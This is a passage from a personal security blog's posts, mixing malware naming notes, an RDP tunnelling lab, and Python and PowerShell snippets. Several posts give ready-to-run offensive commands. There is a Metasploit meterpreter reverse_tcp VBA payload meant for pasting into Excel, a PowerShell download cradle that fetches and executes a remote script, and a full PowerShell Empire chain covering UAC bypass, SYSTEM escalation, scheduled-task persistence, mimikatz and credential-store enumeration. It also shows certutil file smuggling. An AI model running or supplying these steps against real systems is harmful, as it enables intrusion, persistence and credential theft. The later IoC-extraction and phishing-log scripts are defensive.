Monday, February 24, 2020

McAfee Antivirus Malware Virus Type Names Prefixes

from here from 2017

http://download.nai.com/products/datfiles/4.x/nai/readme.txt

  A97M/    Macro virus that infects Microsoft
            Access 97 files.

   APM/     Macro virus or Trojan horse program
            that infects Ami Pro document and
            template files.

   Bat/     Batch-file virus or Trojan horse
            program. These viruses usually run
            as batch or script files that
            affect a particular program that
            interprets the script or batch
            commands they include. They are
            very portable and can affect nearly
            any platform that can run batch or
            script files. The files themselves
            often have a .bat extension.

   CSC/     Corel Script virus or Trojan horse
            program that infects Corel Draw
            document files, template files, and
            scripts.

   IRC/     Internet Relay Chat script virus.
            This virus type can use early
            versions of the mIRC client
            software to distribute a virus or
            payload.

   JS/      Script virus or Trojan horse
            program written in JavaScript
            language.

   JV/      Potentially harmful Java
            application or applet.

   Linux/   Virus or Trojan horse program
            compiled for Linux operating system 
            in ELF file format.

   LWP/     Potentially harmful software for
            Lotus WordPro.

   MacHC/   Virus or Trojan horse program for
            Apple Macintosh HyperCard scripting
            language.

   MacOS/   Virus or Trojan horse program for
            Apple Macintosh OS versions 6-9.

   MSIL/    Application written using Microsoft
            Intermediate Language framework,
            also known as .NET.

   P98M/    Macro virus or Trojan horse program
            that infects Microsoft Project
            documents and templates.

   PalmOS/  Virus or Trojan horse program for a
            Palm Pilot.

   PDF/     File-infector of Adobe PDF files.

   Perl/    Script virus or Trojan horse
            program written in Perl language.

   PHP/     Script virus or Trojan horse
            program written in PHP language.

   PP97M/   Macro virus. Infects Microsoft
            PowerPoint 97 files.

   RDN/ Denoting the malware signature 
            was authored by McAfee Automation system.

   SunOS/   Potentially harmful software for
            Sun Solaris.

   SWF/     Potentially harmful software for
            Shockwave.

   Unix/    Program or a shell script for a
            version of UNIX.

   V5M/     Macro or script virus, or
            Trojan horse program that infects
            Visio VBA (Visual Basic for
            Applications) macros or scripts.

   VBS/     Script virus or Trojan horse
            program written in Visual Basic
            Script language.

   W16/     File-infector virus that runs in
            16-bit Microsoft Windows
            environments (Windows 3.1x).

   W2K/     Potentially harmful software for
            32-bit Microsoft Windows
            environments, specifically Windows
            NT, 2000, or XP.

   W32/     File-infector or boot-sector virus
            that runs in 32-bit Microsoft
            Windows environments (Windows 95,
            Windows 98, or Windows NT).

   W95/     File-infector virus that runs in
            Microsoft Windows 95, Windows 98,
            and Windows ME environments.

   W97M/    Macro virus that infects Microsoft
            Word 97 files.

   WHLP/    Potentially harmful software for
            32-bit Microsoft Windows
            environments that target Windows
            HLP files.

   WM/      Macro virus that infects Microsoft
            Word 95 files.

   X97M/    Macro virus that infects Microsoft
            Excel 97 files.

   XF/      Macro virus that infects Microsoft
            Excel 95 or 97 via Excel formulas.

   XM/      Macro virus that infects Microsoft
            Excel 95 files.


   AdClicker  - Repeatedly accesses websites that
               are funded by advertising.

   Adware - Installs advertising software but
                  does not ask permission.

   BackDoor - Provides remote access or control
                  through the Internet or network.

   Dialer - Dials a phone number without 
                  asking for permission.

   DDoS  - Operates as a Distributed Denial of
                  Service component.

   Del  - Deletes files.

   Downloader - Downloads software from the
                  Internet, usually to deliver
                  backdoors, password stealers, and
                  sometimes viruses.

   Exploit - Uses a vulnerability or a software
                  defect.

   FDoS  - Denotes a Flooding Denial of
                  Service component.

   KeyLog - Logs keystrokes for immediate or
                  future transmission to the
                  attacker.

   Kit  - Denotes a program designed for
                  creating a virus or Trojan horse
                  program.

   MultiDropper - Drops several Trojan horse programs
                  or viruses (often several different
                  ‘backdoors’).

   Nuke  - Uses defects in software installed 
                  on a remote computer to bring it down.

   ProcKill - Terminates the processes of
                  anti-virus and security products.
                  May also delete files associated
                  with such applications.
 
   PWS  - Steals a password.

   Reboot - Reboots the computer.

   Reg  - Modifies the Registry in an
                  undesirable fashion without asking
                  questions. For example, reduces the
                  security settings or creates
                  abnormal associations or sets.

   Spam  - Acts as a spamming tool.

   Spyware - Monitors browsing habits or other
                  behavior and sends the information
                  out, often for unsolicited
               advertising.

   Uploader - Sends files or other data from the
                  computer.

   Vtool - Denotes a program used by virus
                  writers or hackers for developing
                  software.

   Zap  - Wipes all or part of a hard disk.


Thursday, February 20, 2020

FireEye RDP Tunneling walk-through

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

setup 2 vms both set to "internal network" in oracle virtualbox
1 vm is windows 10
1 vm is kali linux
ensure they can ping eachother

setup in windows 10 vm
- download plink.exe from putty website

setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)

steps to perform rdp tunneling
1.) on windows victim box
     plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

   (note: this sets up an ssh tunnel from your windows victim box to your linux attacker box , note kaliLinuxIPAddress is replaced with the IP of your attacker box, and root is replaced with whatever account you want to ssh with ... you should see an ssh connection going from the windows box to the attacker box on port 22)

2.) then on the kali linux box
     rdesktop -u VictimAccount  127.0.0.1:12345

     or

     xfreerdp /u:VictimAccount 127.0.0.1:12345

     or
 
     use remmina for RDP and connect to 127.0.0.1:12345 (this is what worked for me best on Windows 10, the others did not appear to be able to support the proper network authentication encryption)

     (note: now you should be brought up a remote desktop session to the victim box from your attacker box, the interesting things is that you won't see any rdp traffic , only the already established ssh connection/tunnel on port 22, also on the victim box you won't see any traffic in the logs from the attacker box, you'll only see source ip of 127.0.0.1 on everything, such as in the remote desktop logs)

Saturday, February 15, 2020

python pefile ctypes kernel32.dll examples

import pefile
import ctypes
kfile = pefile.PE(r'Kernel32.dll')


--- *** displays all exports such as *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
 print(export.name)


--- *** executes a command like whoami *** ---
k32.WinExec(b'whoami')


--- *** creates a new folder *** ---
k32.CreateDirectoryW(r'c:\users\win10\testfolder', None)


--- *** prints length of a string *** ---
k32.lstrlenA(b'something')

--- *** start and stop a timer *** ---
start = k32.GetTickCount()
end = k32.GetTickCount()
elaspedTime = (end-start)/1000

--- *** get process id for the python.exe program running this code *** ---
k32.GetCurrentProcessId()

--- *** get current working directory *** ---
s=ctypes.create_string_buffer(50)
k32.GetCurrentDirectoryA(len(s), s)
string = ""
for i in s:
 if not i.decode() == "\x00":
  string = string + i.decode()

--- *** get environment variables APPDATA value *** --
s=ctypes.create_string_buffer(50)
k32.GetEnvironmentVariableA(b'APPDATA',s,len(s))
string = ""
for i in s:
 if not i.decode() == "\x00":
  string = string + i.decode()

Friday, February 14, 2020

Generate Meterpreter Metasploit VBA

msfconsole
use payload/windows/meterpreter/reverse_tcp
show options
setg LHOST 10.10.10.10
setg LPORT 3000
generate -t vba -f meterpreter.vba

copy & paste into excel

Powershell download cradle

sample download cradle in conjuction with python -m SimpleHTTPServer 80

powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) setup a listener
listeners
userlistener http
execute

2.) create a stager
userstager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) setup web server to server malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have victim pc execute reach to attacker pc, download launcher.ps1, execute

5.) interact with agent
**you should see agent check-in as soon as step #4 above is complete
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usermodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getssystem
execute

12.) see where you are
whoami    (should says SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usermodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found

Thursday, February 13, 2020

Powershell split and sort

In powershell if you have a ugly string like the environment path


PS c:\> $env:PATH

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\Microsoft VS Code\bin


you can quickly split it out and make it pretty like this

PS c:\> $env:PATH -Split ";" | Sort-Object -Unique

C:\Program Files (x86)\IBM\Client Access\
C:\Program Files\Microsoft VS Code\bin
C:\Program Files\PuTTY\
C:\WINDOWS
C:\WINDOWS\system32
C:\WINDOWS\System32\OpenSSH\
C:\WINDOWS\System32\Wbem
C:\WINDOWS\System32\WindowsPowerShell\v1.0\

Tuesday, February 11, 2020

Using certutil.exe to transfer files

1.) create a file to encode/transfer

> Add-Content test.txt "a test"

2.) pack it up as a certificate before transfer

> $raw = get-content -path test.txt -Encoding Byte
> $b64 = [System.Convert]::ToBase64String($raw)
> $begin = "-----BEGIN CERTIFICATE-----"
> $end = "-----END CERTIFICATE-----"
> "$begin$b64$end"|Out-File output.txt

3.) transfer it however you like

4.) receiving end decodes it back to original state with certutil

> certutil.exe -decode output.txt decoded.txt
> get-content decoded.txt
      a test



---
explanation
- create a file you want to encode/transfer
- convert it to raw bytes
- base64 it
- wrap it into a legit certificate file

- now you can transfer it

- then on the receiving end use certutil.exe to decode it back to it's original state

Friday, February 7, 2020

python test ioc extractor

# Steps
# 1.) Drop IoCs [IP address or urls only currentl] from things below into "iocs.txt"
# - Emotet ( https://twitter.com/Cryptolaemus1 )
# - UrlHaus ( https://urlhaus.abuse.ch/downloads/csv_online/ )
# - Phish Tank ( https://www.phishtank.com/phish_search.php?page=1&active=y&valid=y&Search=Search )
# - Trickbot ( https://twitter.com/search?q=%23trickbot&src=typed_query&f=live )
# 2.) run script
import sys
import os
import re
from urllib.parse import urlparse
debug = 0
filepath = 'iocs.txt'
ipfilepath = 'ips.txt'
dnsfilepath = 'dns.txt'
ioccontainswhitelist = [
".sendgrid.net"
]
iocwhitelist = [
"google.com",
"www.google.com",
"urlhaus.abuse.ch",
"pastebin.com",
"ak.imgfarm.com",
"docs.google.com",
"drive.google.com",
"i.imgur.com",
"img.sobot.com",
"imgur.com",
"www.imgur.com",
"raw.githubusercontent.com",
"github.com",
"www.github.com",
"adobe.com",
"www.adobe.com",
"ibm.com",
"www.ibm.com",
"dell.com",
"www.dell.com",
"bing.com",
"www.bing.com",
"msn.com",
"www.msn.com",
"documentcloud.adobe.com",
"cisco.com",
"www.cisco.com",
"oshkosh.webex.com",
"l.yimg.com",
"yimg.com",
"dl.dropboxusercontent.com",
"dropbox.com",
"www.dropbox.com",
"godaddy.com",
"godaddysites.com",
"files.constantcontact.com",
"ipinfo.io",
"bit.ly",
"onedrive.live.com",
"000webhostapp.com",
"storage.googleapis.com",
"wikileaks.org",
"forms.gle",
"go2l.ink",
"capesandbox.com",
"twitter.com",
"paste.cryptolaemus.com",
"cryptolaemus.com",
"gist.githubusercontent.com",
"bitbucket.org",
"img1.wsimg.com",
"cdn.discordapp.com",
"web.mit.edu",
"bit.do",
"na3.docusign.net",
"sway.office.com",
"sites.google.com",
"aka.ms",
"login.microsoftonline.com",
"track.smtpsendmail.com",
"r20.rs6.net",
"files.gamebanana.com",
"sems.sas.com"
]
with open(filepath) as fp:
 rawLine = fp.readline().rstrip()
 ipResults = []
 dnsResults = []
 while rawLine:
  if debug:
   print("DEBUG: reviewing %s" % rawLine)
  found = 0
  ioc = None
  isIp = 0
  isDns = 0
  ipRegex = re.findall( r'(\d+\.\d+\.\d+\.\d+)', rawLine )
  if ipRegex:
   ioc = ipRegex[0]
   isIp = 1
   if debug:
    print("DEBUG: IP address %s" % ioc)
  if not ioc:
   urlRegex = re.search('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', rawLine) 
   if urlRegex:
    parts = urlRegex.group().split('/')
    if parts and len(parts) > 2:
     ioc = urlRegex[0].split('/')[2]
     isDns = 1
     if debug:
      print("DEBUG: url with http %s" % ioc)
   if not ioc:
    if debug:
     print("DEBUG: checking url 2nd time")
    urlRegexV2 = re.search('^([a-zA-Z.]+\.([a-zA-Z]){2,7}\/.*)$', rawLine) 
    if urlRegexV2:
     parts = urlRegexV2.group().split('/')
     if parts and len(parts) > 0:
      ioc = parts[0]
      isDns = 1
      if debug:
       print("DEBUG: url without http %s" % ioc)
    else:
     if debug:
      print("DEBUG: checking url 3rd time")
     urlTest = re.search('^([a-zA-Z.]+)\.([a-zA-Z]){2,7}$', rawLine) 
     if urlTest:
      ioc = rawLine
      isDns = 1
      if debug:
       print("DEBUG: url domain only %s" % ioc)
  if ioc:
   ioc = ioc.lower()
   for ignoredIoc in iocwhitelist:
    if ioc == ignoredIoc.lower():
     found = 1
     if debug:
      print("DEBUG: ignored %s" % ioc)
     break
   for ignoredIoc in ioccontainswhitelist:
    if ignoredIoc.lower() in ioc:
     found = 1
     if debug:
      print("DEBUG: ignored %s" % ioc)
     break
   if found == 0:
    if "..." not in ioc:
     if isIp:
      ipResults.append(ioc)
     if isDns:
      dnsResults.append(ioc)
  rawLine = fp.readline()

ipResults = sorted(set(ipResults))
dnsResults = sorted(set(dnsResults))

with open(ipfilepath,"w+") as fp:
 for ioc in ipResults:
  fp.write("%s\n" % ioc)
 if len(ipResults) > 0:
  print("%s created" % ipfilepath)

with open(dnsfilepath,"w+") as fp:
 for ioc in dnsResults:
  fp.write("%s\n" % ioc)
 if len(dnsResults) > 0:
  print("%s created" % dnsfilepath)
 

Monday, February 3, 2020

phishing log hunting

import requests
import os
filepath = 'urls.txt'
folders = ["", "log", "logs", "script", "scripts"]
files = ["logs.txt", "log.txt", "log.html", "logs.html", "error_logs.txt", "error_log.txt", "script.txt", "1.php", "ise.txt", "user.txt", "users.txt", "stored.txt", "fullz.txt", "accounts.txt", "login.txt", "logins.txt", "U1.txt"]
printfailures = 0
foundcount = 0
quietmode = 1
printstatus = 1
searchcount = 0
with open(filepath) as fp:
 theurl = fp.readline()
 while theurl:
  searchcount = searchcount + 1
  theurl = theurl.strip()
  lastparen = theurl.rfind("/")
  baseurl = ""
  if lastparen > 10:
   baseurl = theurl[:lastparen]
  else:
   baseurl = theurl
  if printstatus == 1:
   if searchcount % 10 == 0:
    print("----------")
    print("STATUS   : %s done" % searchcount)
    print("----------")
  if quietmode == 0:
   print("----------")
   print("TESTING  : %s" % baseurl)
   print("----------")
  timeout = 0
  foundcount = 0
  for folder in folders:
   if timeout == 1:
    break
   if foundcount > 2:
    break
   for file in files:
    if timeout == 1:
     if quietmode == 0:
      print("**TIMEOUT DETECTED, CANCELLING")
     break
    if foundcount > 2:
     print("**HIGH HIT RATE DETECTED, STOPPING SEARCH, LIKELY FALSE POSITIVE")
     break
    stem = ("/%s/%s" % (folder, file))
    stem = stem.replace("//", "/")
    url = ("%s%s" % (baseurl, stem))
    try:
     response = requests.get(url, timeout=2)
     if response.status_code == 200:
      foundcount = foundcount + 1
      if quietmode == 1:
       if foundcount == 1:
        print("----------")
        print("URL      : %s" % baseurl)
        print("----------")
      print("=>FOUND<=: %s (RESPONSE: %s)" % ( stem , str(response.status_code) ))
     else:
      if printfailures == 1:
       if quietmode == 0:
        print("**FAIL   : %s (RESPONSE: %s)" % ( stem , str(response.status_code) ))
    except:
     timeout = 1
     if printfailures == 1:
      if quietmode == 0:
       print("**FAIL   : %s (TIMEOUT)" % theurl)
  if foundcount == 0:
   if quietmode == 0:
    print("**0 HITS")
  theurl = fp.readline()